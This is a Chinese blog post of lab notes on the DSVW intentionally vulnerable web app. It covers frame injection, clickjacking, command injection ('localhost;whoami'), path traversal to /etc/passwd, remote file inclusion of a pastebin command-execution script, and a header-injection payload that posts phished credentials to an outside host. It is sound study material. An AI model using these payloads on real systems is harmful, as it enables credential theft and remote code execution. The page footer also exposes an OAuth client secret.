<h2 id="Frame-Injection-phishing"><a href="#Frame-Injection-phishing" class="headerlink" title="Frame Injection (phishing)"></a>Frame Injection (phishing)</h2><p>框架注入，没了解过，上网学习<br>一个找到的<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_39934520/article/details/106130670">学习链接</a></p>
<p><del>好像就是类似于XSS，或者说是它的一种攻击情况</del><br>在网页中注入含有恶意内容的frame或iframe标签<br>框架注入攻击允许黑客将用户重定向到用于网络钓鱼和类似攻击的其他恶意网站</p>
<p>可以考虑使用内容安全策略（CSP）标头来防御此类攻击</p>
<hr>
<p>靶场接口也是简单地GET传递<code>v</code>参数，之前测试XSS的也是这里</p>
<p>官方payload：<br><code>/?v=0.2&lt;iframe src=&quot;http://dsvw.c1.biz/i/login.html&quot; style=&quot;background-color:white;z-index:10;top:10%;left:10%;position:fixed;border-collapse:collapse;border:1px solid #a8a8a8&quot;&gt;&lt;/iframe&gt;</code><br>后面还有一些样式属性<br>执行效果为在页面中间出现一个方框展现另一个站点的内容</p>
<p>感觉和XSS差不多<br>估计可以指向恶意站点或加载恶意脚本，从而执行恶意操作</p>
<h2 id="Frame-Injection-content-spoofing"><a href="#Frame-Injection-content-spoofing" class="headerlink" title="Frame Injection (content spoofing)"></a>Frame Injection (content spoofing)</h2><p>官方payload：<br><code>/?v=0.2&lt;iframe src=&quot;http://dsvw.c1.biz/&quot; style=&quot;background-color:white;width:100%;height:100%;z-index:10;top:0;left:0;position:fixed;&quot; frameborder=&quot;0&quot;&gt;&lt;/iframe&gt;</code></p>
<p>和上一个的区别好像就是<br>恶意框架是覆盖了整个原页面<br>估计是想达成欺骗用户的效果</p>
<p>上一个的phishing，是“网络钓鱼”的意思<br>这个content spoofing，是“内容欺骗”的意思<br>好像都是钓鱼？</p>
<h2 id="Clickjacking"><a href="#Clickjacking" class="headerlink" title="Clickjacking"></a>Clickjacking</h2><p>点击劫持，大概也是XSS的一种利用形式吧，我猜的</p>
<p>官方payload：<br><code>/?v=0.2&lt;div style=&quot;opacity:0;filter:alpha(opacity=20);background-color:#000;width:100%;height:100%;z-index:10;top:0;left:0;position:fixed;&quot; onclick=&quot;document.location=&#39;http://dsvw.c1.biz/&#39;&quot;&gt;&lt;/div&gt;</code></p>
<p>就是利用之前XSS的地方，往整个页面上覆盖了一个<code>div</code>标签<br>然后设置一点击，就会跳到别的页面<br>估计这样达成刷流量或刷点击率或执行恶意脚本的目的<br>当然这个<code>onclick</code>函数也可以设置成别的</p>
<p>但是覆盖一层<code>div</code>之后，鼠标放到蓝链上不会有“小指头”了</p>
<h2 id="Unvalidated-Redirect"><a href="#Unvalidated-Redirect" class="headerlink" title="Unvalidated Redirect"></a>Unvalidated Redirect</h2><p>不安全的URL跳转</p>
<p>一个<code>redir</code>参数传入要跳转的URL，官方payload也是截向了别的网站</p>
<p>估计是可以给用户控制，用正确的域名做钓鱼链接，欺骗性比较好吧</p>
<h2 id="Arbitrary-Code-Execution"><a href="#Arbitrary-Code-Execution" class="headerlink" title="Arbitrary Code Execution"></a>Arbitrary Code Execution</h2><p>任意代码执行</p>
<p><code>domain</code>参数传入一个域名，之后返回域名的IP信息：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Server:		10.10.10.254</span><br><span class="line">Address:	10.10.10.254#53</span><br><span class="line"></span><br><span class="line">Non-authoritative answer:</span><br><span class="line">Name:	www.google.com</span><br><span class="line">Address: 142.250.207.68</span><br></pre></td></tr></table></figure>

<p>看回显，估计是系统执行了类似<code>dig www.google.com</code>之类的命令吧<br>（当然上面不像是dig命令后的回显）<br>（后面看了看源码，是nslookup）</p>
<p>于是可以试试传参后面加<code>;</code>，再拼接别的命令试试<br>payload：<code>/?domain=localhost;whoami</code><br>回显：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Server:		10.10.10.254</span><br><span class="line">Address:	10.10.10.254#53</span><br><span class="line"></span><br><span class="line">Name:	localhost.localdomain</span><br><span class="line">Address: 127.0.0.1</span><br><span class="line"></span><br><span class="line">root</span><br></pre></td></tr></table></figure>

<p>存在任意命令执行漏洞</p>
<p><del>然后关机：<code>/?domain=localhost;shutdown~</code></del><br><del><code>Shutdown scheduled for Wed 2021-12-01 15:35:14 CST, use &#39;shutdown -c&#39; to cancel.</code></del><br><del>赶紧取消</del><br><del>皮一下</del></p>
<h2 id="Full-Path-Disclosure"><a href="#Full-Path-Disclosure" class="headerlink" title="Full Path Disclosure"></a>Full Path Disclosure</h2><p>绝对路径暴露？</p>
<p>好像传入不同的绝对路径，会告诉你“路径&#x2F;文件不存在”或“XXX是一个文件夹”等<br>从而目录遍历？</p>
<h2 id="Source-Code-Disclosure"><a href="#Source-Code-Disclosure" class="headerlink" title="Source Code Disclosure"></a>Source Code Disclosure</h2><p>呃，传入<code>path</code>参数为<code>/usr/share/DSVW/dsvw.py</code>就爆出了页面源码</p>
<p>我愿意称之为敏感信息暴露或任意文件访问</p>
<h2 id="Path-Traversal"><a href="#Path-Traversal" class="headerlink" title="Path Traversal"></a>Path Traversal</h2><p>路径穿越</p>
<p>传入<code>path</code>参数为<code>../../../../../../../../etc/passwd</code></p>
<p>类似于上面两个，估计是想突出“dot-dot-slash”在文件访问的对外接口中可用</p>
<h2 id="File-Inclusion-remote"><a href="#File-Inclusion-remote" class="headerlink" title="File Inclusion (remote)"></a>File Inclusion (remote)</h2><p>远程文件包含</p>
<p>直接给<code>include</code>参数去包含远程脚本，好啊</p>
<p>官方payload：<br><code>/?include=http://pastebin.com/raw.php?i=6VyyNNhc&amp;cmd=ifconfig</code><br>从而执行远程脚本</p>
<p>这里只能包含（Python）脚本文件<br>文本文件如<code>passwd</code>会报Python语法错误</p>
<hr>
<p>关于这个<a target="_blank" rel="noopener" href="http://pastebin.com/raw.php?i=6VyyNNhc%EF%BC%9A">http://pastebin.com/raw.php?i=6VyyNNhc：</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">import</span> urllib.parse</span><br><span class="line"></span><br><span class="line">params = <span class="built_in">dict</span>((<span class="keyword">match</span>.group(<span class="string">&quot;parameter&quot;</span>), urllib.parse.unquote(<span class="keyword">match</span>.group(<span class="string">&quot;value&quot;</span>))) <span class="keyword">for</span> <span class="keyword">match</span> <span class="keyword">in</span> re.finditer(<span class="string">r&quot;((\A|[?&amp;])(?P&lt;parameter&gt;[\w\[\]]+)=)(?P&lt;value&gt;[^&amp;]+)&quot;</span>, QUERY_STRING))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="string">&quot;cmd&quot;</span> <span class="keyword">in</span> params:</span><br><span class="line">    result = subprocess.check_output(params[<span class="string">&quot;cmd&quot;</span>], shell=<span class="literal">True</span>, stderr=subprocess.STDOUT)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;&lt;pre&gt;%s&lt;/pre&gt;&quot;</span> % result.decode())</span><br></pre></td></tr></table></figure>

<p>接受一个cmd参数去执行命令</p>
<h2 id="HTTP-Header-Injection-phishing"><a href="#HTTP-Header-Injection-phishing" class="headerlink" title="HTTP Header Injection (phishing)"></a>HTTP Header Injection (phishing)</h2><p>HTTP头注入-钓鱼版</p>
<p>一个GET的<code>charset</code>参数，接受字符集参数（实际上什么都行）<br>传过去之后，会直接拼接在返回包的<code>Content-Type</code>头里边：<br><code>Content-Type: text/html; charset=utf8</code><br>值得注意的是，是拼接在HTTP返回头的最后面的，再下面就是空行以及返回体了</p>
<p>于是有了官方payload：<br><code>/?charset=utf8%0D%0AX-XSS-Protection:0%0D%0AContent-Length:388%0D%0A%0D%0A%3C!DOCTYPE%20html%3E%3Chtml%3E%3Chead%3E%3Ctitle%3ELogin%3C%2Ftitle%3E%3C%2Fhead%3E%3Cbody%20style%3D%27font%3A%2012px%20monospace%27%3E%3Cform%20action%3D%22http%3A%2F%2Fdsvw.c1.biz%2Fi%2Flog.php%22%20onSubmit%3D%22alert(%27visit%20%5C%27http%3A%2F%2Fdsvw.c1.biz%2Fi%2Flog.txt%5C%27%20to%20see%20your%20phished%20credentials%27)%22%3EUsername%3A%3Cbr%3E%3Cinput%20type%3D%22text%22%20name%3D%22username%22%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput%20type%3D%22password%22%20name%3D%22password%22%3E%3Cinput%20type%3D%22submit%22%20value%3D%22Login%22%3E%3C%2Fform%3E%3C%2Fbody%3E%3C%2Fhtml%3E</code></p>
<p>解码一下，就是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">/?charset=utf8</span><br><span class="line">X-XSS-Protection:0</span><br><span class="line">Content-Length:388</span><br><span class="line"></span><br><span class="line">&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;Login&lt;/title&gt;&lt;/head&gt;&lt;body style=&#x27;font: 12px monospace&#x27;&gt;&lt;form action=&quot;http://dsvw.c1.biz/i/log.php&quot; onSubmit=&quot;alert(&#x27;visit \&#x27;http://dsvw.c1.biz/i/log.txt\&#x27; to see your phished credentials&#x27;)&quot;&gt;Username:&lt;br&gt;&lt;input type=&quot;text&quot; name=&quot;username&quot;&gt;&lt;br&gt;Password:&lt;br&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot;&gt;&lt;input type=&quot;submit&quot; value=&quot;Login&quot;&gt;&lt;/form&gt;&lt;/body&gt;&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>于是拼接之后，检测到空行，就默认读到了返回体<br>于是就回显了payload构造的HTML内容<br>于是就形成了钓鱼的效果</p>
<p>就是说可以对于参数拼接到返回头的，要特别小心<br>可能会被控制返回的HTML内容<br>而域名是正确的<br>可能会被钓鱼</p>
<h2 id="Component-with-Known-Vulnerability-pickle"><a href="#Component-with-Known-Vulnerability-pickle" class="headerlink" title="Component with Known Vulnerability (pickle)"></a>Component with Known Vulnerability (pickle)</h2><p>不安全组件（pickle？）</p>
<p>这个需要雄厚的第三方组件或者是CVE的知识&#x3D; &#x3D;</p>
<hr>
<p>pickle是Python标准库，用于实现Python对象的二进制序列化和反序列化</p>
<p><a target="_blank" rel="noopener" href="https://docs.python.org/zh-cn/3/library/pickle.html">官方文档</a></p>
<blockquote>
<p><em>“pickling”</em> 是将 Python 对象及其所拥有的层次结构转化为一个字节流的过程，而 <em>“unpickling”</em> 是相反的操作，会将（来自一个 <a target="_blank" rel="noopener" href="https://docs.python.org/zh-cn/3/glossary.html#term-binary-file">binary file</a> 或者 <a target="_blank" rel="noopener" href="https://docs.python.org/zh-cn/3/glossary.html#term-bytes-like-object">bytes-like object</a> 的）字节流转化回一个对象层次结构。</p>
</blockquote>
<p>关于pickle模块的缺陷，官方简要解释如下：</p>
<blockquote>
<p>警告</p>
<p><code>pickle</code> 模块<strong>并不安全</strong>。你只应该对你信任的数据进行unpickle操作。</p>
<p>构建恶意的 pickle 数据来<strong>在解封时执行任意代码</strong>是可能的。绝对不要对不信任来源的数据和可能被篡改过的数据进行解封。</p>
<p>请考虑使用 <a target="_blank" rel="noopener" href="https://docs.python.org/zh-cn/3/library/hmac.html#module-hmac"><code>hmac</code></a> 来对数据进行签名，确保数据没有被篡改。</p>
<p>在你处理不信任数据时，更安全的序列化格式如 <a target="_blank" rel="noopener" href="https://docs.python.org/zh-cn/3/library/json.html#module-json"><code>json</code></a> 可能更为适合。参见  <a target="_blank" rel="noopener" href="https://docs.python.org/zh-cn/3/library/pickle.html#comparison-with-json">与 json 模块的比较</a> 。</p>
</blockquote>
<p>源码的一处相关代码：<br><code>content = str(pickle.loads(params[&quot;object&quot;].encode()))</code><br>估计是执行一个反序列化的过程</p>
<h2 id="Denial-of-Service-memory"><a href="#Denial-of-Service-memory" class="headerlink" title="Denial of Service (memory)"></a>Denial of Service (memory)</h2><p>DOS！</p>
<p>一个<code>size</code>参数，传入32的返回：<br><code>Time required (to &#39;resize image&#39; to 32x32): 0.000009 seconds</code></p>
<p>估计会根据参数调用服务器资源去生成图片<br>要是参数过大，则会过分消耗服务器资源，形成DOS</p>
<p>点击官方payload后，页面长时间不回应，断开了连接，系统也变卡</p>
<p>算是提供了一个防御恶意DOS的方向<br>注意合理控制用户对系统资源的消耗</p>
<h2 id="靶场总结"><a href="#靶场总结" class="headerlink" title="靶场总结"></a>靶场总结</h2><p>还算可以，补充了一些Web漏洞知识，特别是XPath注入</p>
<p>但是靶场太“精致”了，很多漏洞点的演示过于简单<br>一些利用场景要求学习者有一定基础才可能理解出来</p>
<p>最后再感叹一下代码之精简，不到一百行就整了个靶场<br>（虽然很多地方重用，但还是可以加深下各漏洞的对比和理解）</p>
<h2 id="源码学习"><a href="#源码学习" class="headerlink" title="源码学习"></a>源码学习</h2><p>源码不放了，<a target="_blank" rel="noopener" href="https://github.com/stamparm/DSVW/blob/master/dsvw.py">这里</a><br>（值得注意的是这个靶场的作者就是sqlmap的作者，NB）</p>
<p>刚认真看了下。。。。<br>感觉也不用可以去学？<br>感觉这种刻意压缩编码的感觉，是屎山？（其实不是）</p>
<p>算了算了，学学HTTP服务相关吧</p>
	
		</div>
		
		<div id="current-post-cover" data-scr="/img/post-cover/default.jpg"></div>

		<!-- relate post, comment...-->
		<div class="investment-container">
			<div class="investment-header">
				<div class="investment-title-1">
					<div class="on">相关文章</div>
					<div>评论</div>
					<!-- <div>分享</div> -->
				</div>
				<div class="investment-title-2">	            
					
	<span>
		<a id="totop-post-page">返回顶部</a>
		
			<a href="/2022/12/11/%E3%80%8A%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%E5%AE%9E%E6%88%98%E3%80%8B%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="《恶意代码分析实战》学习笔记" rel="prev">
				&laquo;上一篇
			</a>
		
		
			<a href="/2022/10/06/Web%E9%9D%B6%E5%9C%BA-Pikachu/" title="Web靶场-Pikachu" rel="next">
				下一篇&raquo;
			</a>
			
	</span>


      		
				</div>	
			</div>
			
			<div class="investment-content">
				<div class="investment-content-list">
					

<div class="relate-post">
	
		<ul>
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2024/09/10/PortSwigger%E9%9D%B6%E5%9C%BA-Server-Side-Template-Injection/" title="PortSwigger靶场-Server-Side Template Injection">
								PortSwigger靶场-Server-Side Template Injection			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								九月 10日, 2024				
							</p>
							<p class="relate-post-content">
								0 总结
服务端模板注入本身是个很抽象的概念，需要判断目标使用了什么具体的模板
识别之后就是大量地读文档和查资料，找到可能的攻击点
还要探测目标的特定环境进行攻击
不太好找，可能与XSS弄混；找到了也可能不太好利用

1 简介
201...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2024/09/10/PortSwigger%E9%9D%B6%E5%9C%BA-Server-Side-Template-Injection/" title="PortSwigger靶场-Server-Side Template Injection">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/post-cover/portswigger.jpg" alt="PortSwigger靶场-Server-Side Template Injection"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2023/07/07/Web%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86-SQLi/" title="Web漏洞整理-SQLi">
								Web漏洞整理-SQLi			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								七月 7日, 2023				
							</p>
							<p class="relate-post-content">
								[NOTE] SQLi前言主要是之前练习了很多靶场所设计到的SQLi的笔记都比较分散这里就系统地整理下，主要是整合到一起，方便以后查阅
整理自靶场练习Webgoat、pikachu、Web For Pentester、XVWA、sql...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2023/07/07/Web%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86-SQLi/" title="Web漏洞整理-SQLi">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/post-cover/WebVuln1.jpg" alt="Web漏洞整理-SQLi"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2023/06/04/Web%E9%9D%B6%E5%9C%BA-upload-labs/" title="Web靶场-upload-labs">
								Web靶场-upload-labs			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								六月 4日, 2023				
							</p>
							<p class="relate-post-content">
								环境攻击机：kali 10.10.10.128靶机：Debian 11.1 x64 
Pass-01任务：上传一个webshell到服务器
直接怼，显示：

改成basic.jpg，点击上传后bp抓包，修改后缀为.php，上传成功了：...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2023/06/04/Web%E9%9D%B6%E5%9C%BA-upload-labs/" title="Web靶场-upload-labs">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/post-cover/default.jpg" alt="Web靶场-upload-labs"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2023/05/04/PHP-Web%E6%B8%97%E9%80%8F%E4%B8%AD%E5%B8%B8%E8%A7%81%E7%9A%84%E9%AB%98%E5%8D%B1%E5%87%BD%E6%95%B0%E4%BB%A5%E5%8F%8A%E4%BC%AA%E5%8D%8F%E8%AE%AE/" title="PHP-Web渗透中常见的高危函数以及伪协议">
								PHP-Web渗透中常见的高危函数以及伪协议			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								五月 4日, 2023				
							</p>
							<p class="relate-post-content">
								代码执行函数eval
代码：&lt;?php @eval($_GET[&#39;cmd&#39;]);?&gt;
利用：http://10.10.10.3/test.php?cmd=phpinfo();
assert
代码：&lt;?...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2023/05/04/PHP-Web%E6%B8%97%E9%80%8F%E4%B8%AD%E5%B8%B8%E8%A7%81%E7%9A%84%E9%AB%98%E5%8D%B1%E5%87%BD%E6%95%B0%E4%BB%A5%E5%8F%8A%E4%BC%AA%E5%8D%8F%E8%AE%AE/" title="PHP-Web渗透中常见的高危函数以及伪协议">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/post-cover/PHP.png" alt="PHP-Web渗透中常见的高危函数以及伪协议"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2023/05/01/Webshell%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/" title="Webshell流量分析">
								Webshell流量分析			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								五月 1日, 2023				
							</p>
							<p class="relate-post-content">
								菜刀一句话在这里：&lt;?php eval($_POST[&#39;myhack&#39;]) ?&gt;
用的某个工具包里的菜刀，流量如下：

agent有火狐5.0以及百度
连接密码开头，用了array_map封装命令执行函数，...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2023/05/01/Webshell%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/" title="Webshell流量分析">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/post-cover/oiiai.jpg" alt="Webshell流量分析"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2023/03/30/sqli-labs-Stacked-Injections/" title="sqli-labs Stacked Injections">
								sqli-labs Stacked Injections			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								三月 30日, 2023				
							</p>
							<p class="relate-post-content">
								[NOTE] sqli-labs Stacked Injections前言针对sqli-labs靶场的做题笔记
环境虚拟机环境攻击机：kali | 10.10.10.1靶机：Debian 11.1 | 10.10.10.3 | Apa...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2023/03/30/sqli-labs-Stacked-Injections/" title="sqli-labs Stacked Injections">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/post-cover/rickroll.jpg" alt="sqli-labs Stacked Injections"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/10/06/Web%E9%9D%B6%E5%9C%BA-Pikachu/" title="Web靶场-Pikachu">
								Web靶场-Pikachu			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 6日, 2022				
							</p>
							<p class="relate-post-content">
								[NOTE] Pikachu靶场练习笔记前言是针对Pikachu靶场的练习笔记是在搞完WebGoat之后想着再找一个靶场玩玩
环境攻击者：Kali Linux | 10.10.10.1靶机：Ubuntu | 10.10.10.2 | ...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/10/06/Web%E9%9D%B6%E5%9C%BA-Pikachu/" title="Web靶场-Pikachu">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/post-cover/default.jpg" alt="Web靶场-Pikachu"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/05/10/%E4%B8%80%E4%BA%9BBurpSuite%E8%BF%9B%E9%98%B6%E4%BD%BF%E7%94%A8/" title="一些BurpSuite进阶使用">
								一些BurpSuite进阶使用			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								五月 10日, 2022				
							</p>
							<p class="relate-post-content">
								[NOTE] Burp Suite进阶前言目前只是些平时练习过程中接触到的BP进阶使用方法和技巧
后续再考虑找些专门的教程学学
使用宏抓取页面token下面以抓取pikachu靶场爆破模块的token为例
来自于g0tmi1k的文章
...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/05/10/%E4%B8%80%E4%BA%9BBurpSuite%E8%BF%9B%E9%98%B6%E4%BD%BF%E7%94%A8/" title="一些BurpSuite进阶使用">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/post-cover/burpsuite.png" alt="一些BurpSuite进阶使用"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/01/16/Web%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86-XSS/" title="Web漏洞整理-XSS">
								Web漏洞整理-XSS			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								一月 16日, 2022				
							</p>
							<p class="relate-post-content">
								[NOTE] XSS前言主要是之前练习了很多靶场所设计到的XSS的笔记都比较分散这里就系统地整理下，主要是整合到一起，方便以后查阅
整理自靶场练习Webgoat、pikachu、Web For Pentester、XVWA以及一个很有...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/01/16/Web%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86-XSS/" title="Web漏洞整理-XSS">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/post-cover/WebVuln2.jpg" alt="Web漏洞整理-XSS"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/01/13/SQL%E4%B8%8Esqlmap/" title="SQL与sqlmap">
								SQL与sqlmap			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								一月 13日, 2022				
							</p>
							<p class="relate-post-content">
								[NOTE] SQL与sqlmapSQL语法order by

对查询结果排序
ASC：升序（默认）、DESC：降序
SQL注入中多在成功查询之后添加order by i来猜解回显的字段数
如XXX/?id=1&#39; order ...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/01/13/SQL%E4%B8%8Esqlmap/" title="SQL与sqlmap">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/post-cover/rickroll.jpg" alt="SQL与sqlmap"/>
							</a>
						</div>
					</li>												
			
		</ul>
	
</div>	
				</div>
				<div class="investment-content-list">
					<div class="layout-comment">

	

		

			<!-- gitalk comment -->
			<!-- show gitalk comment -->
<div id="gitalk-container"></div>

<!-- gitalk`s css & js -->
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<link rel="stylesheet" href="/css/comment.css">
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

<script type="text/javascript">

	(function gitalkComment(){
		//Thanks O-R
		//https://github.com/gitalk/gitalk/issues/102#issuecomment-382970552
		//去除尾部匹配正则数组的字符串  
		//Remove redundant characters
		String.prototype.trimEnd = function(regStr) {
			let result = this;
			if(regStr == undefined || regStr == null || regStr == "") {
				return result;
			}
			let array = regStr.split(',');

			if(array.length > 0) {

				let c = array.shift(), 
					str = this,
					i = str.length,
					rg = new RegExp(c),
					matchArr = str.match(rg);

				if(matchArr != undefined && matchArr != null && matchArr.length > 0) {
					let matchStr = matchArr[0].replace(/\\/g, "\\\\").replace(/\*/g, "\\*")
						.replace(/\+/g, "\\+").replace(/\|/g, "\\|")
						.replace(/\{/g, "\\{").replace(/\}/g, "\\}")
						.replace(/\(/g, "\\(").replace(/\)/g, "\\)")
						.replace(/\^/g, "\\^").replace(/\$/g, "\\$")
						.replace(/\[/g, "\\[").replace(/\]/g, "\\]")
						.replace(/\?/g, "\\?").replace(/\,/g, "\\,")
						.replace(/\./g, "\\.").replace(/\&/g, "\\&");
					matchStr = matchStr + '$';
					result = str.replace(new RegExp(matchStr), "");
				}

				if(array.length > 0) {
					return result.trimEnd(array.join())
				} else {
					return result;
				}
			}
		};

		//Create gitalk
		let gitalk = new Gitalk({
			clientID: 'Ov23liAb4iwJ1VAXeknf',
			clientSecret: 'dbb92e8b0d3419b2a395abc8331a12e38e330e6c',
			//id: window.location.pathname,
			//id: decodeURI(window.location.pathname),
			//id: (window.location.pathname).split("/").pop().substring(0, 49),
			id: decodeURI( md5( location.href.trimEnd('#.*$,\\?.*$,index.html$') ) ),
			repo: 'Blog-Gitalk',
			owner: 'ArcheriShade',
			admin: 'ArcheriShade',
			distractionFreeMode: 'true',
		})
		gitalk.render('gitalk-container');		
	})();
</script>

		
		
	

</div>
				</div>
				<!-- <div class="investment-content-list">
					<div class="layout-share">
	
	
		<div class="config-info">
			Please check the parameter of <b>comment</b> in config.yml of hexo-theme-Annie!
		</div>	
	
</div>


				</div> -->
			</div>	
		</div>
	</div>
</div>

<!-- show math formula -->



	 
	
<script src="/plugin/clipboard/clipboard.js"></script>

	<script>
		// Copy code !
	    function preprocessing() {
	        $("#article-content .highlight").each(function() {
	            $(this).wrap('<div id="post-code"></div>');
	        })

	        $("#article-content #post-code").each(function() {
	            $(this).prepend('<nav class="copy-nav"><span><i class="code-language"></i></span></nav>');
	        })

	        $("#article-content .copy-nav").each(function() {
	            let languageClass = $(this).next().attr('class'),
	                language = ((languageClass.length > 9) && (languageClass != null)) ? languageClass.substr(10) : "none"; //why 9? Need to check language?

	            $(this).find('.code-language').text(language);
	            $(this).append('<span class="copy-btn icon-paste"></span>');
	        });
	    }

		function copy() {
		    $('#article-content #post-code').each(function(i) {
		        let codeCopyId = 'codeCopy-' + i;

		        let codeNode = $(this).find('.code'),
		            copyButton = $(this).find('.copy-btn');

		        codeNode.attr('id', codeCopyId);
		        copyButton.attr('data-clipboard-target-id', codeCopyId);
		    })
   
			let clipboard = new ClipboardJS('.copy-btn', {
					target: function(trigger) {
						return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
					}
		      	});

			//pure js
			function showTooltip(elem, msg) {		   
				elem.setAttribute('aria-label', msg);
				elem.setAttribute('class', 'copy-btn icon-clipboard1');
				setTimeout(function() {
					elem.setAttribute('class', 'copy-btn icon-paste');
				}, 2000);
			}

			clipboard.on('success', function(e) {
			    e.clearSelection();
			    console.info('Action:', e.action);		   
			    console.info('Trigger:', e.trigger);
			    showTooltip(e.trigger, 'Copied!');   
			});
			
			clipboard.on('error', function(e) {
			    console.error('Action:', e.action);
			    console.error('Trigger:', e.trigger);
			});
		}
		
		(function copyCode(){
			if ($('.layout-post').length) {
			    preprocessing();
			    copy();
			} 
		})();
	</script>






<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">


<script src="/plugin/fancybox/jquery.fancybox.js"></script>


<script type="text/javascript">
	(function gallerySet(){
		let titleID = $('.article-title a'),
			imageID = $('.article-content img'),
			videoID = $('.article-content video');
		
		let postTitle = titleID.text() ? titleID.text() : "No post title!";
		
		imageID.each(function() {
			let imgPath = $(this).attr('src'),
				imgTitle = $(this).attr('alt') ? $(this).attr('alt') : "No image description!";
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox="gallery" data-caption="《 ' + postTitle + ' 》' + imgTitle + '"href="' + imgPath + '"> </a>');
		});
		
		videoID.each(function() {
			let videoPath = $(this).attr('src');
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox href=" ' + videoPath + ' "> </a>');
		});
		
		//TODO：支持html5 video

		if($('#layout-post').length) {
			$('[data-fancybox="gallery"]').fancybox({
				loop: true,
				buttons: [
					"zoom",
					"share",
					"slideShow",
					"fullScreen",
					//"download",
					"thumbs",
					"close"
				],
				protect: true
			});
		}
	})();
</script>
		</main>

		<!--footer-->
		<footer>
	<div id="navigation-show">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
